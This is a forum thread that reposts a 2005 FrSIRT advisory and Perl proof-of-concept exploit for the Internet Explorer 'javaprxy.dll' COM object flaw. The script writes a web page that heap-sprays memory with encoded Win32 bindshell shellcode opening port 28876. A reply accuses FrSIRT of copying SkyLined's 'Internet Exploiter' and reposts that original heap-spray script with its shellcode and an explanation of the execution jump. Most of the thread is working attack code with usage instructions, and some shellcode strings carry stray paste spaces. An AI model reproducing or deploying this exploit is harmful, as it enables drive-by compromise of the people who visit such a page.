PDA

Bekijk Volledige Versie : Microsoft Internet Explorer "javaprxy.dll" Code Execution Exploit


team@frsirt.com
02/07/05, 23:55
Microsoft Internet Explorer "javaprxy.dll" COM Object Exploit (Unpatched)

Advisory : FrSIRT/ADV-2005-0935
Rated as : Critical
Status : Unpatched
Code : http://www.frsirt.com/exploits/20050702.iejavaprxyexploit.pl.php

#!/usr/bin/perl
################################################## ####
#
# Microsoft Internet Explorer "javaprxy.dll" COM Object Exploit -Unpatched-
#
# Proof of Concept by the FrSIRT < http://www.frsirt.com / team@frsirt.com >
# Bindshell on port 28876
# 01 July 2005
#
# Description - http://www.frsirt.com/english/advisories/2005/0935
# Workarounds - http://www.microsoft.com/technet/security/advisory/903144.mspx
# Sec-consult - http://www.sec-consult.com/184.html
#
# Solution :
# Set Internet and Local intranet security zone settings to "High" or use
# another browser until a patch is released.
#
# Tested on :
# Internet Explorer 6 on Microsoft Windows XP SP2
# Internet Explorer 6 on Microsoft Windows XP SP1
#
# Affected versions :
# Internet Explorer 5.01 Service Pack 3 on Microsoft Windows 2000 Service Pack 3
# Internet Explorer 5.01 Service Pack 4 on Microsoft Windows 2000 Service Pack 4
# Internet Explorer 6 Service Pack 1 on Microsoft Windows 2000 Service Pack 3
# Internet Explorer 6 Service Pack 1 on Microsoft Windows 2000 Service Pack 4
# Internet Explorer 6 Service Pack 1 on Microsoft Windows XP Service Pack 1
# Internet Explorer 6 for Microsoft Windows XP Service Pack 2
# Internet Explorer 6 Service Pack 1 for Microsoft Windows XP 64-Bit SP1 (Itanium)
# Internet Explorer 6 for Microsoft Windows Server 2003
# Internet Explorer 6 for Microsoft Windows Server 2003 Service Pack 1
# Internet Explorer 6 for Microsoft Windows Server 2003 for Itanium-based Systems
# Internet Explorer 6 for Microsoft Windows Server 2003 with SP1 for Itanium
# Internet Explorer 6 for Microsoft Windows XP 64-Bit Edition Version 2003 (Itanium)
# Internet Explorer 6 for Microsoft Windows Server 2003 x64 Edition
# Internet Explorer 6 for Microsoft Windows XP Professional x64 Edition
# Internet Explorer 5.5 Service Pack 2 on Microsoft Windows Millennium Edition
# Internet Explorer 6 Service Pack 1 on Microsoft Windows 98
# Internet Explorer 6 Service Pack 1 on Microsoft Windows 98 SE
# Internet Explorer 6 Service Pack 1 on Microsoft Windows Millennium Edition
#
# Usage : perl iejavaprxyexploit.pl > mypage.html
#
################################################## ####

# header
my $header = "<html><body>\n<SCRIPT language=\"javascript\">\n";

# Win32 bindshell (port 28876) - SkyLined
my $shellcode = "shellcode = unescape(\"%u4343\"+\"%u4343\"+\"%u43eb".
"%u5756%u458b%u8b3c%u0554%u0178%u52ea%u528b%u0120%u 31ea".
"%u31c0%u41c9%u348b%u018a%u31ee%uc1ff%u13cf%u01ac%u 85c7".
"%u75c0%u39f6%u75df%u5aea%u5a8b%u0124%u66eb%u0c8b%u 8b4b".
"%u1c5a%ueb01%u048b%u018b%u5fe8%uff5e%ufce0%uc031%u 8b64".
"%u3040%u408b%u8b0c%u1c70%u8bad%u0868%uc031%ub866%u 6c6c".
"%u6850%u3233%u642e%u7768%u3273%u545f%u71bb%ue8a7%u e8fe".
"%uff90%uffff%uef89%uc589%uc481%ufe70%uffff%u3154%u fec0".
"%u40c4%ubb50%u7d22%u7dab%u75e8%uffff%u31ff%u50c0%u 5050".
"%u4050%u4050%ubb50%u55a6%u7934%u61e8%uffff%u89ff%u 31c6".
"%u50c0%u3550%u0102%ucc70%uccfe%u8950%u50e0%u106a%u 5650".
"%u81bb%u2cb4%ue8be%uff42%uffff%uc031%u5650%ud3bb%u 58fa".
"%ue89b%uff34%uffff%u6058%u106a%u5054%ubb56%uf347%u c656".
"%u23e8%uffff%u89ff%u31c6%u53db%u2e68%u6d63%u8964%u 41e1".
"%udb31%u5656%u5356%u3153%ufec0%u40c4%u5350%u5353%u 5353".
"%u5353%u5353%u6a53%u8944%u53e0%u5353%u5453%u5350%u 5353".
"%u5343%u534b%u5153%u8753%ubbfd%ud021%ud005%udfe8%u fffe".
"%u5bff%uc031%u5048%ubb53%ucb43%u5f8d%ucfe8%ufffe%u 56ff".
"%uef87%u12bb%u6d6b%ue8d0%ufec2%uffff%uc483%u615c%u 89eb\");\n";

# Memory
my $code = "bigblock = unescape(\"%u0D0D%u0D0D\");\n".
"headersize = 20;\n".
"slackspace = headersize+shellcode.length\n".
"while (bigblock.length<slackspace) bigblock+=bigblock;\n".
"fillblock = bigblock.substring(0, slackspace);\n".
"block = bigblock.substring(0, bigblock.length-slackspace);\n".
"while(block.length+slackspace<0x40000) block = block+block+fillblock;\n".
"memory = new Array();\n".
"for (i=0;i<750;i++) memory[i] = block + shellcode;\n".
"</SCRIPT>\n";

# javaprxy.dll
my $clsid = '03D9F3F2-B0E3-11D2-B081-006008039BF0';

# footer
my $footer = "<object classid=\"CLSID:".$clsid."\"></object>\n".
"Microsoft Internet Explorer javaprxy.dll COM Object Remote Exploit\n".
"by the FrSIRT < http://www.frsirt.com >\n".
"Solution - http://www.frsirt.com/english/advisories/2005/0935".
"</body><script>location.reload();</script></html>";

# print "Content-Type: text/html;\r\n\r\n"; # if you are in cgi-bin
print "$header $shellcode $code $footer";
stupidfrenchdudes@ripoff.fr
04/07/05, 23:45
Why don't you give Skylined credit for the exploit code instead of just ripping it off?
give_credit@where_credit_is_due.fr
05/07/05, 22:55
Although I respect these Frenchies for their "attempt" to make the Internet safer, I denounce them for failing miserably. I think it's worth noting that they stole Skylined's code, stripped it of the GPL, the comments, and the credit, only to make themsel
ves look better. This is the original script:

<HTML><!--
__________________________________________________ ______________________________

,sSSSs, Ss, Internet Exploiter v0.1
SS" `YS' '*Ss. MSIE <IFRAME src=... name="..."> BoF PoC exploit
iS' ,SS" Copyright (C) 2003, 2004 by Berend-Jan Wever.
YS, .ss ,sY" http://www.edup.tudelft.nl/~bjwever
`"YSSP" sSS <skylined@edup.tudelft.nl>
__________________________________________________ ______________________________

This program is free software; you can redistribute it and/or modify it under
the terms of the GNU General Public License version 2, 1991 as published by
the Free Software Foundation.

This program is distributed in the hope that it will be useful, but WITHOUT
ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
details.

A copy of the GNU General Public License can be found at:
http://www.gnu.org/licenses/gpl.html
or you can write to:
Free Software Foundation, Inc.
59 Temple Place - Suite 330
Boston, MA 02111-1307
USA.
-->

<SCRIPT language="javascript">
// Win32 MSIE exploit helper script, creates a lot of nopslides to land in
// and/or use as return address. Thanks to blazde for feedback and idears.

// Win32 bindshell (port 28876, '\0' free, looping). Thanks to HDM and
// others for inspiration and borrowed code.
shellcode = unescape("%u4343%u4343%u43eb%u5756%u458b%u8b3c%u0554%u0178%u 52ea%u528b%u0120%u31ea%u31c0%u41c9%u348b%u018a%u31 ee%uc1ff%u13cf%u01ac%u85c7%u75c0%u39f6%u75df%u5aea %u5a8b%u0124%u66eb%u0c8b%u8b4b%u1c5a%ueb01%u048b%u 018b%u5fe8%uff5e%ufce0%uc031%
u8b64%u3040%u408b%u8b0c%u1c70%u8bad%u0868%uc031%ub 866%u6c6c%u6850%u3233%u642e%u7768%u3273%u545f%u71b b%ue8a7%ue8fe%uff90%uffff%uef89%uc589%uc481%ufe70% uffff%u3154%ufec0%u40c4%ubb50%u7d22%u7dab%u75e8%uf fff%u31ff%u50c0%u5050%u4050%u4050%ubb50%u55a6%u793 4%u61
e8%uffff%u89ff%u31c6%u50c0%u3550%u0102%ucc70%uccfe %u8950%u50e0%u106a%u5650%u81bb%u2cb4%ue8be%uff42%u ffff%uc031%u5650%ud3bb%u58fa%ue89b%uff34%uffff%u60 58%u106a%u5054%ubb56%uf347%uc656%u23e8%uffff%u89ff %u31c6%u53db%u2e68%u6d63%u8964%u41e1%udb31%u5656%u 5356%
u3153%ufec0%u40c4%u5350%u5353%u5353%u5353%u5353%u6 a53%u8944%u53e0%u5353%u5453%u5350%u5353%u5343%u534 b%u5153%u8753%ubbfd%ud021%ud005%udfe8%ufffe%u5bff% uc031%u5048%ubb53%ucb43%u5f8d%ucfe8%ufffe%u56ff%ue f87%u12bb%u6d6b%ue8d0%ufe
c2%uffff%uc483%u615c%u89eb");
// Nopslide will contain these bytes:
bigblock = unescape("%u0D0D%u0D0D");
// Heap blocks in IE have 20 dwords as header
headersize = 20;
// This is all very 1337 code to create a nopslide that will fit exactly
// between the the header and the shellcode in the heap blocks we want.
// The heap blocks are 0x40000 dwords big, I can't be arsed to write good
// documentation for this.
slackspace = headersize+shellcode.length
while (bigblock.length<slackspace) bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace<0x40000) block = block+block+fillblock;
// And now we can create the heap blocks, we'll create 700 of them to spray
// enough memory to be sure enough that we've got one at 0x0D0D0D0D
memory = new Array();
for (i=0;i<700;i++) memory[i] = block + shellcode;
</SCRIPT>
<!--
The exploit sets eax to 0x0D0D0D0D after which this code gets executed:
7178EC02 8B08 MOV ECX, DWORD PTR [EAX]
[0x0D0D0D0D] == 0x0D0D0D0D, so ecx = 0x0D0D0D0D.
7178EC04 68 847B7071 PUSH 71707B84
7178EC09 50 PUSH EAX
7178EC0A FF11 CALL NEAR DWORD PTR [ECX]
Again [0x0D0D0D0D] == 0x0D0D0D0D, so we jump to 0x0D0D0D0D.
We land inside one of the nopslides and slide on down to the shellcode.
-->

<!-- Heap corruption issue here -->
</HTML>

You can find Skylined's site as well as his heap corruption exploitation script (called Internet Exploiter) at http://www.edup.tudelft.nl/~bjwever/